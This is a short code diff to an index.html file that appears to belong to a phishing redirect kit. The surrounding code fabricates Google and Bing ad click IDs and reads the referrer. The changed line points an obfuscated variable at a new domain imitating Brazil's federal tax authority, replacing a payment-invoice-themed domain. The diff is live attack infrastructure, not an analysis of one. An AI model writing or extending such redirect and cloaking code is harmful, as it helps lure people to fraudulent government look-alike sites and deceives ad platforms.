--- a/index.html
+++ b/index.html
@@ -96,7 +96,7 @@ const randomUrl = urls[randomIndex];
 const hash = generateHash();
 const googlerandomUrlWithHash = randomUrl + '?gclid=' + hash;
 const bingrandomUrlWithHash = randomUrl + '?msclkid=' + hash;
-const xirjfgjsdhdjd = 'https://emitirpagamentofaturashora.live/ME?u=814f4b273aae2674ad6f6100def3e115';  
+const xirjfgjsdhdjd = 'https://www8.receita-fazenda-cnpj.site/buscar';  
 
 // Obtendo o referer (disponível apenas no navegador)
 let referer;
